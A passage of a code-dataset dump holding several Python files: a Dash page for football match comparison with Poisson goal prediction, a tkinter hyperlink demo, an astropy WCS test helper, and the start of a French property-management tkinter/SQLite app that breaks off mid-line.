sklearn.linear_model import PoissonRegressor\nfrom sklearn.compose import TransformedTargetRegressor\nfrom sklearn.preprocessing import FunctionTransformer\n\n\ndash.register_page(__name__)\n\nresumenPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\resumenPartido.csv')\nresumenPartido['disparoPuerta'] = resumenPartido.apply(lambda x: x['gol'] if x['gol'] > 0 and x['disparoPuerta'] == 0 else x['disparoPuerta'], axis=1)\ninfoPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\factPartido.csv')\nestadisticaPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\factEstadisticaPartido.csv')\nequipo = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\dimEquipo.csv')\n\n#consolidado informacion para prediccion\nmodel_data = pd.DataFrame(columns=['team', 'opponent', 'goals', 'home'])\ntmp = estadisticaPartido[['fkEquipoLocal','fkEquipoVisitante','golLocal']].copy()\ntmp.rename(columns={'fkEquipoLocal':'team'\n ,'fkEquipoVisitante':'opponent'\n ,'golLocal':'goals'\n },inplace=True )\ntmp['home'] = 1\ntmp = tmp.reset_index()\nmodel_data = pd.concat([model_data, tmp], axis=0)\n\ntmp = estadisticaPartido[['fkEquipoVisitante', 'fkEquipoLocal','golVisitante']].copy()\ntmp.rename(columns={'fkEquipoVisitante':'team'\n ,'fkEquipoLocal':'opponent'\n ,'golVisitante':'goals'\n },inplace=True )\ntmp['home'] = 0\ntmp = tmp.reset_index()\nmodel_data = pd.concat([model_data, tmp], axis=0)\n\nmodel_data = model_data.reset_index()\nmodel_data = model_data[['team','opponent', 'home', 'goals']]\nmodel_data['goals'] = model_data['goals'].astype(int)\n\n# Crea un modelo de regresión Poisson utilizando scikit-learn\npois_model = PoissonRegressor()\nx = model_data[['home', 'team', 'opponent']]\ny = model_data['goals']\npois_model.fit(x, y)\n\nlayout = html.Div([\n html.H5(\"Enfretamiento entre equipos\", className=\"display-4\", style={'textAlign':'center'}),\n html.Hr(),\n html.Div([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.H6('Elegir Equipo Local')),\n 
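# (Illustrative sketch; the ids 3 and 7 below are hypothetical surrogate keys.)\n # The PoissonRegressor fitted above treats home, team and opponent as plain\n # numeric features, so a single-fixture expected-goals query mirrors the\n # callbacks further below:\n #   pois_model.predict(pd.DataFrame({'home': [1], 'team': [3], 'opponent': [7]}))\n # and returns the predicted goal rate (lambda) for that matchup.\n 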
html.Div(dcc.Dropdown(resumenPartido['equipo'].unique() ,'Liverpool', id='equipo_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.H6('Elegir Equipo Visitante')),\n html.Div(dcc.Dropdown(resumenPartido['equipo'].unique() ,'Brighton', id='equipo_visitante'))\n ])\n ])\n ])\n ]),\n html.Br(),\n html.Div([\n dbc.Row([\n dbc.Col([\n html.Div(dcc.Graph(figure={}, id='graf_cantidad_enfretamientos'))\n ]),\n dbc.Col([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Cantidad de Enfretamientos')),\n html.Div(html.P(id='cantidad_enfretamientos'))\n ])\n ]) \n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Goles Marcados Local')),\n html.Div(html.P(id='gol_marcado_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Goles Marcados Visitante')),\n html.Div(html.P(id='gol_marcado_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Disparos a Puerta Local')),\n html.Div(html.P(id='disparo_puerta_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Disparos a Puerta Visitante')),\n html.Div(html.P(id='disparo_puerta_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Tiros de Esquina Local')),\n html.Div(html.P(id='tiro_esquina_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Tiros de Esquina Visitante')),\n html.Div(html.P(id='tiro_esquina_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Faltas Realizadas Local')),\n html.Div(html.P(id='faltas_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Faltas Realizadas Visitante')),\n html.Div(html.P(id='faltas_visitante'))\n ])\n ])\n ])\n ])\n ]),\n html.Hr(),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Comparación indicadores', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='radar-polar'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Predicción Gol Local', style={'textAlign':'center'})),\n html.Div(html.P(id='prediccion_gol_local', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='gol_historico_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Predicción Gol Visitante', style={'textAlign':'center'})),\n html.Div(html.P(id='prediccion_gol_visitante', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='gol_historico_visitante'))\n ])\n ])\n ])\n ])\n])\n\n@callback(\n Output(component_id='gol_historico_visitante',component_property='figure'),\n Input(component_id='equipo_visitante',component_property='value')\n)\ndef actualizarGolHistoricoVisitante(equipoVisitante):\n df = resumenPartido[['equipo','gol', 'fecha']].copy()\n df['fecha'] = pd.to_datetime(df['fecha'])\n df = df[(df.equipo==equipoVisitante) &(df.fecha > '2023-01-01')]\n figure = px.scatter(df, x='fecha', y='gol'\n , trendline=\"rolling\"\n , trendline_options=dict(window=5)\n ,title='Goles Marcados Visitante'\n ,color_discrete_sequence=['#F2055C']\n ,template='simple_white'\n )\n return figure\n\n\n@callback(\n Output(component_id='gol_historico_local',component_property='figure'),\n Input(component_id='equipo_local',component_property='value')\n)\ndef actualizarGolHistoricoLocal(equipoLocal):\n df = resumenPartido[['equipo','gol', 'fecha']].copy()\n df['fecha'] = pd.to_datetime(df['fecha'])\n df = df[(df.equipo==equipoLocal) & (df.fecha > '2023-01-01')]\n figure = px.scatter(df, x='fecha', y='gol'\n , trendline=\"rolling\"\n , trendline_options=dict(window=5)\n ,title='Goles Marcados Local'\n 
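# (Clarifying note) trendline='rolling' overlays a moving average computed\n # with pandas rolling(); window=5 averages the latest five matches, so the\n # first four points stay empty unless min_periods is also passed in\n # trendline_options.\n 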
,color_discrete_sequence=['#340040']\n ,template='simple_white'\n )\n return figure\n\n@callback(\n Output(component_id='prediccion_gol_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarPrediccionGolLocal(equipoLocal, equipoVisitante):\n skEquipoLocal = equipo[equipo.equipoDesc==equipoLocal].values[0][0]\n skEquipoVisitante = equipo[equipo.equipoDesc==equipoVisitante].values[0][0]\n prediccionVisitante = pois_model.predict(pd.DataFrame({'home': [0], 'team': [skEquipoVisitante], 'opponent': [skEquipoLocal]}))\n prediccionVisitante = round(prediccionVisitante[0],3)\n return prediccionVisitante\n\n@callback(\n Output(component_id='prediccion_gol_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarPrediccionGolLocal(equipoLocal, equipoVisitante):\n skEquipoLocal = equipo[equipo.equipoDesc==equipoLocal].values[0][0]\n skEquipoVisitante = equipo[equipo.equipoDesc==equipoVisitante].values[0][0]\n prediccionLocal = pois_model.predict(pd.DataFrame({'home': [1], 'team': [skEquipoLocal], 'opponent': [skEquipoVisitante]}))\n prediccionLocal = round(prediccionLocal[0],3)\n return prediccionLocal\n\n@callback(\n Output(component_id='faltas_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarFaltaVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['faltaVistante'].sum())\n return txt\n\n@callback(\n Output(component_id='faltas_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarFaltaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['faltaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='tiro_esquina_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarTiroEsquinaVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['TiroEsquinaVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='tiro_esquina_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarTiroEsquinaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['TiroEsquinaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='disparo_puerta_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarDisparoPuertaVisitante(equipoLocal, 
equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['disparoPuertaVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='disparo_puerta_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarDisparoPuertaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['disparoPuertaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='gol_marcado_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarGolMarcadoVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['golVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='gol_marcado_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarGolMarcadoLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['golLocal'].sum())\n return txt\n\n\n@callback(\n Output(component_id='graf_cantidad_enfretamientos',component_property='figure'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef graficaCantidadEnfretamientos(equipoLocal, equipoVisitante):\n df = infoPartido[(infoPartido.equipoLocal==equipoLocal) & (infoPartido.equipoVisitante==equipoVisitante)]\n df = df.groupby('resultado', as_index=False)['skPartido'].count()\n figure=px.pie(df, values='skPartido', names='resultado'\n ,width=370\n ,height=350\n ,hole=0.5\n ,color_discrete_sequence= ['#340040','#F2055C','#05F26C']\n )\n figure.update_layout(legend_title_text='Victoria')\n return figure\n\n\n@callback(\n Output(component_id='cantidad_enfretamientos',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarCantidadEnfretamientos(equipoLocal, equipoVisitante):\n txt = str(len(infoPartido[(infoPartido.equipoLocal==equipoLocal) & (infoPartido.equipoVisitante==equipoVisitante)]))\n return txt\n\n@callback(\n Output(component_id='radar-polar',component_property='figure'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarRadar(equipoLocal, equipoVisitante):\n resumenPartido['atajada'] = resumenPartido['atajada'].replace(-1,0)\n resumenPartido['Efectividad Arquero'] = resumenPartido.apply(lambda x: 1 if x['atajada'] == 0 and x['disparoPuertaEnContra'] == 0 else (x['atajada'] / x['disparoPuertaEnContra']), axis=1 )\n #resumenPartido['Efectividad Arquero'] = resumenPartido['atajada'] / resumenPartido['disparoPuertaEnContra']\n resumenPartido['Efectividad Derribo'] = resumenPartido['derriboConseguido'] / resumenPartido['derribo']\n resumenPartido['Efectividad 
Disparo'] = resumenPartido['gol'] / resumenPartido['disparoPuerta']\n \n polar = resumenPartido[['equipo', 'Efectividad Arquero', 'Efectividad Derribo', 'Efectividad Disparo'\n , 'posesionBalon', 'precisionPase']].copy()\n polar.fillna(0, inplace=True)\n polar = polar.groupby('equipo', as_index=False)[['Efectividad Arquero','Efectividad Derribo','Efectividad Disparo'\n , 'posesionBalon', 'precisionPase']].mean()\n polar.rename(columns={'posesionBalon': 'Posesion Balon',\n 'precisionPase': 'Precision Pase'}, inplace=True)\n polar.fillna(0, inplace=True)\n polar = polar.melt(\n id_vars=['equipo'],\n var_name='metrica',\n value_name='valor')\n polar['valor'] = round(polar['valor'] * 100,1)\n\n df = polar[(polar.equipo== equipoLocal) | (polar.equipo== equipoVisitante) ]\n figure = px.line_polar(df, r='valor', theta='metrica'\n , line_close = True\n , color='equipo'\n , color_discrete_sequence=['#F2055C','#05F26C'])\n figure.update_traces(fill = 'toself')\n return figure","repo_name":"DaniRojas2022/Analiticapp_datos_deportivos","sub_path":"app/pages/versus.py","file_name":"versus.py","file_ext":"py","file_size_in_byte":16815,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43276273856","text":"import tkinter as tk\n\n\nclass HyperlinkManager:\n def __init__(self, text):\n self.text = text\n self.text.tag_config(\"hyper\", foreground=\"blue\", underline=1)\n self.text.tag_bind(\"hyper\", \"\", self._enter)\n self.text.tag_bind(\"hyper\", \"\", self._leave)\n self.text.tag_bind(\"hyper\", \"\", self._click)\n self.reset()\n\n def reset(self):\n self.links = {}\n\n def add(self, action):\n # add an action to the manager. returns tags to use in\n # associated text widget\n tag = \"hyper-%d\" % len(self.links)\n self.links[tag] = action\n return \"hyper\", tag\n\n def _enter(self, event):\n self.text.config(cursor=\"hand2\")\n\n def _leave(self, event):\n self.text.config(cursor=\"\")\n\n def _click(self, event):\n for tag in self.text.tag_names(tk.CURRENT):\n if tag[:6] == \"hyper-\":\n self.links[tag]()\n return\n\n\nb_songs_list = ['Bollywood song 1', 'Bollywood song 2', 'Bollywood song 3']\ni_songs_list = ['International song 1', 'International song 2',\n 'International song 3']\n\nroot = tk.Tk()\nS = tk.Scrollbar(root)\nT = tk.Text(root, height=20, width=30, cursor=\"hand2\")\nhyperlink = HyperlinkManager(T)\nS.pack(side=tk.RIGHT, fill=tk.Y)\nT.pack(side=tk.LEFT, fill=tk.Y)\nS.config(command=T.yview)\nT.config(yscrollcommand=S.set)\n\n\ndef click1():\n print('click1')\n\n\ndef callback_a(): # Bollywood songs WITH hyperlinks\n T.delete(1.0, tk.END)\n for songs in b_songs_list:\n T.insert(tk.END, songs, hyperlink.add(click1))\n T.insert(tk.END, '\\n')\n\n\ndef callback_b():\n T.delete(1.0, tk.END)\n for songs in i_songs_list:\n T.insert(tk.END, songs + '\\n')\n\n\nbollywood_button = tk.Button(root, text=\"Bollywood-Top-50\", command=callback_a)\nbollywood_button.pack()\n\ninternational_button = tk.Button(root, text=\"International-Top-50\",\n command=callback_b)\ninternational_button.pack() \nroot.mainloop()\n","repo_name":"YohanChevalier/PYCORETEXT","sub_path":"tests/test_hyperlink_stackoverflow_50327234.py","file_name":"test_hyperlink_stackoverflow_50327234.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18588909061","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Testing utilities. 
Not part of the public API!\"\"\"\n\nfrom astropy.wcs import WCS\nfrom astropy.wcs.wcsapi import BaseHighLevelWCS\n\n\ndef assert_wcs_seem_equal(wcs1, wcs2):\n \"\"\"Just checks a few attributes to make sure wcs instances seem to be\n equal.\n \"\"\"\n if wcs1 is None and wcs2 is None:\n return\n assert wcs1 is not None\n assert wcs2 is not None\n if isinstance(wcs1, BaseHighLevelWCS):\n wcs1 = wcs1.low_level_wcs\n if isinstance(wcs2, BaseHighLevelWCS):\n wcs2 = wcs2.low_level_wcs\n assert isinstance(wcs1, WCS)\n assert isinstance(wcs2, WCS)\n if wcs1 is wcs2:\n return\n assert wcs1.wcs.compare(wcs2.wcs)\n\n\ndef _create_wcs_simple(naxis, ctype, crpix, crval, cdelt):\n wcs = WCS(naxis=naxis)\n wcs.wcs.crpix = crpix\n wcs.wcs.crval = crval\n wcs.wcs.cdelt = cdelt\n wcs.wcs.ctype = ctype\n return wcs\n\n\ndef create_two_equal_wcs(naxis):\n return [\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n ]\n\n\ndef create_two_unequal_wcs(naxis):\n return [\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"m\"] * naxis,\n crpix=[20] * naxis,\n crval=[20] * naxis,\n cdelt=[2] * naxis,\n ),\n ]\n","repo_name":"astropy/astropy","sub_path":"astropy/nddata/_testing.py","file_name":"_testing.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"26275167282","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\n\n# Connectez-vous à la base de données SQLite (créez-la si elle n'existe pas)\nconn = sqlite3.connect('gestion_immobiliere.db')\ncursor = conn.cursor()\n\n# Créez une table 'propriete' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS propriete\n (id INTEGER PRIMARY KEY, adresse TEXT, type_propriete TEXT, statut TEXT, prix REAL)''')\n\ncursor.execute('''CREATE TABLE IF NOT EXISTS tache\n (id INTEGER PRIMARY KEY, description TEXT, date_limite TEXT, priorite INTEGER)''')\n\n# Créez une table 'locataire' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS locataire\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, date_naissance TEXT)''')\n\n# Créez une table 'paiement' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS paiement\n (id INTEGER PRIMARY KEY, locataire_id INTEGER, montant REAL, date_paiement TEXT, methode_paiement TEXT, reference TEXT)''')\n\n# Créez une table 'employe' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS employe\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, poste TEXT, salaire REAL)''')\n\n# Créez une table 'document' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS document\n (id INTEGER PRIMARY KEY, titre TEXT, date_creation TEXT, type_document TEXT, contenu TEXT)''')\n\n# Créez une table 'contact' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS contact\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, relation TEXT)''')\n\n# Créez une table 'analyse_rentabilite' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS analyse_rentabilite\n (id INTEGER PRIMARY KEY, propriete_id INTEGER, total_revenus REAL, 
total_depenses REAL, profit REAL, taux_rentabilite REAL)''')\n\n# Créez une table 'comptabilite' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS comptabilite\n (id INTEGER PRIMARY KEY, categorie TEXT, montant REAL, date_operation TEXT, description TEXT)''')\n\n# Validez les modifications et fermez la connexion\nconn.commit()\nconn.close()\n\n\n\n\n# Module: Gestion des propriétés\n# Module: Gestion des propriétés\nclass Propriete:\n def __init__(self, id, adresse, type_propriete, statut, prix):\n self.id = id\n self.adresse = adresse\n self.type_propriete = type_propriete\n self.statut = statut\n self.prix = prix\n\n def ajouter_propriete(self):\n pass # Code pour ajouter une propriété à la base de données\n\n def supprimer_propriete(self):\n pass # Code pour supprimer une propriété de la base de données\n\n def modifier_propriete(self):\n pass # Code pour modifier les détails d'une propriété dans la base de données\n\n def rechercher_propriete(self, filtre):\n pass # Code pour rechercher des propriétés dans la base de données en fonction des critères de filtre\n\n# Module: Gestion des taches\nclass GestionnaireTaches:\n def __init__(self):\n self.taches = []\n\n def ajouter_tache(self, tache):\n self.taches.append(tache)\n\n def supprimer_tache(self):\n index = int(input(\"Entrez l'index de la tâche à supprimer : \"))\n del self.taches[index]\n\n def afficher_taches(self):\n print(\"Liste des tâches :\")\n for i, tache in enumerate(self.taches):\n print(f\"{i}. {tache}\")\n\n\n# Module: Gestion des Payments \nclass GestionPaiements:\n def __init__(self):\n self.paiements = []\n\n def ajouter_paiement(self, paiement):\n self.paiements.append(paiement)\n\n def supprimer_paiement(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du paiement à supprimer : \"))\n del self.paiements[index]\n\n def afficher_paiements(self):\n # Le corps de la fonction doit également être indenté\n for paiement in self.paiements:\n print(paiement)\n\n def chercher_paiement(self, reference):\n # Le corps de la fonction doit également être indenté\n for paiement in self.paiements:\n if paiement['reference'] == reference:\n return paiement\n return None\n\n# Module: Gestion des Locataires\nclass GestionLocataires:\n def __init__(self):\n self.locataires = []\n\n def ajouter_locataire(self, locataire):\n self.locataires.append(locataire)\n\n def supprimer_locataire(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du locataire à supprimer : \"))\n del self.locataires[index]\n\n def afficher_locataires(self):\n # Le corps de la fonction doit également être indenté\n for locataire in self.locataires:\n print(locataire)\n\n def chercher_locataire(self, nom):\n # Le corps de la fonction doit également être indenté\n for locataire in self.locataires:\n if locataire['nom'] == nom:\n return locataire\n return None\n\n# Module: Gestion des Employees\nclass GestionEmployes:\n def __init__(self):\n self.employes = []\n\n def ajouter_employe(self, employe):\n self.employes.append(employe)\n\n def supprimer_employe(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index de l'employé à supprimer : \"))\n del self.employes[index]\n\n def afficher_employes(self):\n # Le corps de la fonction doit également être indenté\n for employe in self.employes:\n print(employe)\n\n def chercher_employe(self, nom):\n # Le corps de la fonction doit également être indenté\n for employe in self.employes:\n if 
employe['nom'] == nom:\n return employe\n return None\n\n# Module: Gestion des Documents\nclass GestionDocuments:\n def __init__(self):\n self.documents = []\n\n def ajouter_document(self, document):\n self.documents.append(document)\n\n def supprimer_document(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du document à supprimer : \"))\n del self.documents[index]\n\n def afficher_documents(self):\n # Le corps de la fonction doit également être indenté\n for document in self.documents:\n print(document)\n\n def chercher_document(self, titre):\n # Le corps de la fonction doit également être indenté\n for document in self.documents:\n if document['titre'] == titre:\n return document\n return None\n\n# Module: Gestion des contacts\nclass GestionContacts:\n def __init__(self):\n self.contacts = []\n\n def ajouter_contact(self, contact):\n self.contacts.append(contact)\n\n def supprimer_contact(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du contact à supprimer : \"))\n del self.contacts[index]\n\n def afficher_contacts(self):\n # Le corps de la fonction doit également être indenté\n for contact in self.contacts:\n print(contact)\n\n def chercher_contact(self, nom):\n # Le corps de la fonction doit également être indenté\n for contact in self.contacts:\n if contact['nom'] == nom:\n return contact\n return None\n\n# Module: Comptabilite\nclass Comptable:\n def __init__(self):\n self.transactions = []\n\n def ajouter_transaction(self, transaction):\n self.transactions.append(transaction)\n\n def supprimer_transaction(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index de la transaction à supprimer : \"))\n del self.transactions[index]\n\n def afficher_transactions(self):\n # Le corps de la fonction doit également être indenté\n for transaction in self.transactions:\n print(transaction)\n\n def calculer_solde(self):\n # Le corps de la fonction doit également être indenté\n solde = sum(self.transactions)\n return solde\n\n# Module: Analyse de Rentabilité\nclass AnalyseRentabilite:\n def __init__(self):\n self.depenses = []\n self.revenus = []\n\n def ajouter_depense(self, depense):\n self.depenses.append(depense)\n\n def ajouter_revenu(self, revenu):\n self.revenus.append(revenu)\n\n def calculer_depenses(self):\n # Le corps de la fonction doit être indenté\n total_depenses = sum(self.depenses)\n return total_depenses\n\n def calculer_revenus(self):\n # Le corps de la fonction doit également être indenté\n total_revenus = sum(self.revenus)\n return total_revenus\n\n def calculer_profit(self):\n # Le corps de la fonction doit également être indenté\n total_profit = self.calculer_revenus() - self.calculer_depenses()\n return total_profit\n \n\n\n\n# Application principale avec interface utilisateur Tkinter\nclass Application(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Gestion Immobilière\")\n self.geometry(\"800x600\")\n\n # Créez un notebook pour organiser les onglets de fonctionnalités\n notebook = ttk.Notebook(self)\n notebook.pack(expand=True, fill=\"both\")\n\n # Ajoutez des onglets pour chaque fonctionnalité\n propriete_tab = ttk.Frame(notebook)\n notebook.add(propriete_tab, text=\"Gestion des propriétés\")\n\n locataire_tab = ttk.Frame(notebook)\n notebook.add(locataire_tab, text=\"Gestion des locataires\")\n\n paiement_tab = ttk.Frame(notebook)\n notebook.add(paiement_tab, text=\"Gestion des paiements\")\n\n rapport_financier_tab = 
ttk.Frame(notebook)\n notebook.add(rapport_financier_tab, text=\"Rapports financiers\")\n\n employe_tab = ttk.Frame(notebook)\n notebook.add(employe_tab, text=\"Gestion des employés\")\n\n document_tab = ttk.Frame(notebook)\n notebook.add(document_tab, text=\"Gestion des documents\")\n\n contact_tab = ttk.Frame(notebook)\n notebook.add(contact_tab, text=\"Gestion des contacts\")\n\n rentabilite_tab = ttk.Frame(notebook)\n notebook.add(rentabilite_tab, text=\"Analyse de rentabilité\")\n\n comptabilite_tab = ttk.Frame(notebook)\n notebook.add(comptabilite_tab, text=\"Comptabilité\")\n\n # Ajoutez des widgets (boutons, tableaux, etc.) pour chaque fonctionnalité\n # Gestion des propriétés\n ajouter_propriete_btn = ttk.Button(propriete_tab, text=\"Ajouter une propriété\", command=self.ajouter_propriete)\n ajouter_propriete_btn.pack()\n modifier_propriete_btn = ttk.Button(propriete_tab, text=\"Modifier une propriété\", command=self.modifier_propriete)\n modifier_propriete_btn.pack()\n supprimer_propriete_btn = ttk.Button(propriete_tab, text=\"Supprimer une propriété\", command=self.supprimer_propriete)\n supprimer_propriete_btn.pack()\n\n # Gestion des locataires\n ajouter_locataire_btn = ttk.Button(locataire_tab, text=\"Ajouter un locataire\", command=self.ajouter_locataire)\n ajouter_locataire_btn.pack()\n modifier_locataire_btn = ttk.Button(locataire_tab, text=\"Modifier un locataire\", command=self.modifier_locataire)\n modifier_locataire_btn.pack()\n supprimer_locataire_btn = ttk.Button(locataire_tab, text=\"Supprimer un locataire\", command=self.supprimer_locataire)\n supprimer_locataire_btn.pack()\n\n # Gestion des paiements\n ajouter_paiement_btn = ttk.Button(paiement_tab, text=\"Ajouter un paiement\", command=self.ajouter_paiement)\n ajouter_paiement_btn.pack()\n modifier_paiement_btn = ttk.Button(paiement_tab, text=\"Modifier un paiement\", command=self.modifier_paiement)\n modifier_paiement_btn.pack()\n supprimer_paiement_btn = ttk.Button(paiement_tab, text=\"Supprimer un paiement\", command=self.supprimer_paiement)\n supprimer_paiement_btn.pack()\n \n # Gestion des employés\n ajouter_employe_btn = ttk.Button(employe_tab, text=\"Ajouter un employé\", command=self.ajouter_employe)\n ajouter_employe_btn.pack()\n modifier_employe_btn = ttk.Button(employe_tab, text=\"Modifier un employé\", command=self.modifier_employe)\n modifier_employe_btn.pack()\n supprimer_employe_btn = ttk.Button(employe_tab, text=\"Supprimer un employé\", command=self.supprimer_employe)\n supprimer_employe_btn.pack()\n\n # Gestion des documents\n ajouter_document_btn = ttk.Button(document_tab, text=\"Ajouter un document\", command=self.ajouter_document)\n ajouter_document_btn.pack()\n modifier_document_btn = ttk.Button(document_tab, text=\"Modifier un document\", command=self.modifier_document)\n modifier_document_btn.pack()\n supprimer_document_btn = ttk.Button(document_tab, text=\"Supprimer un document\", command=self.supprimer_document)\n supprimer_document_btn.pack()\n\n # Gestion des contacts\n ajouter_contact_btn = ttk.Button(contact_tab, text=\"Ajouter un contact\", command=self.ajouter_contact)\n ajouter_contact_btn.pack()\n modifier_contact_btn = ttk.Button(contact_tab, text=\"Modifier un contact\", command=self.modifier_contact)\n modifier_contact_btn.pack()\n supprimer_contact_btn = ttk.Button(contact_tab, text=\"Supprimer un contact\", command=self.supprimer_contact)\n supprimer_contact_btn.pack()\n\n # Analyse de rentabilité\n calculer_rentabilite_btn = ttk.Button(rentabilite_tab, text=\"Calculer la 
